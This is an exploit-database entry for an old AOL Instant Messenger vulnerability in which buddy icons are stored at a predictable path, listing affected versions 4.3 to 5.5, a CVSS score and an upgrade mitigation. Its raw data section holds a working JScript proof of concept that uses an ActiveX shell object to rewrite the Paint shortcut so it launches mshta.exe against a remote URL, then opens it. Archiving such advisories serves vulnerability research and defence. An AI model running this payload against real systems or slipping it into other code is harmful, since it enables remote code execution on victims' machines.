header-logo
Suggest Exploit
vendor:
AOL Instant Messenger
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary Code Execution
94
CWE
Product Name: AOL Instant Messenger
Affected Version From: 4.3
Affected Version To: 5.5
Patch Exists: Yes
Related CWE: N/A
CPE: aol-instant-messenger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

AOL Instant Messenger Icon Location Vulnerability

A vulnerability in AOL Instant Messenger (AIM) allows an attacker to store imported Buddy Icons in a predictable location on client systems. This could allow an attacker to facilitate further attacks which could eventually lead to execution of arbitrary code. The vulnerability has been tested on AIM versions 4.3 to 5.5, however, other versions may be affected as well.

Mitigation:

Upgrade to the latest version of AIM.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9698/info

It has been reported that AOL Instant Messenger stores imported Buddy Icons in a predictable location on client systems that may allow an attacker to facilitate further attacks which could eventually lead to execution of arbitrary code.

This issue has been tested on AOL Instant Messenger versions 4.3 to 5.5, however, it is possible that other versions are affected as well. 

<script>
var ok = new ActiveXObject("Shell.Application");
f = ok.NameSpace("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Accessories");
i= f.ParseName("Paint.lnk");
l = i.GetLink;
l.Path = "mshta.exe"
l.Arguments ="http://www.example.com"
l.Save("C:\\paint.lnk");
ok.Open("C:\\paint.lnk");
</script>